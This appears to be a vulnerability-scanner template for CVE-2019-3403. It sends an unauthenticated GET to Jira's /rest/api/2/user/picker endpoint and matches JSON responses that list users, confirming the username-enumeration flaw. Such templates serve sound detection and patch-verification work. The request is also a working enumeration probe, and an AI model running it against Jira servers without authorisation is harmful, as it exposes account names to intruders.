id: CVE-2019-3403

info:
  name: User enumeration via an incorrect authorisation check
  author: Ganofins
  severity: medium
  description: The /rest/api/2/user/picker rest resource in Jira before version 7.13.3, from version 8.0.0 before version 8.0.4, and from version 8.1.0 before version 8.1.1 allows remote attackers to enumerate usernames via an incorrect authorisation check.
  reference: https://jira.atlassian.com/browse/JRASERVER-69242
  tags: cve,cve2019,atlassian,jira
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.30
    cve-id: CVE-2019-3403
    cwe-id: CWE-863

requests:
  - method: GET
    path:
      - "{{BaseURL}}/rest/api/2/user/picker?query="

    matchers-condition: and
    matchers:

      - type: status
        status:
          - 200

      - type: word
        words:
          - 'application/json'
        part: header

      - type: word
        words:
          - users
          - total
          - header
        condition: and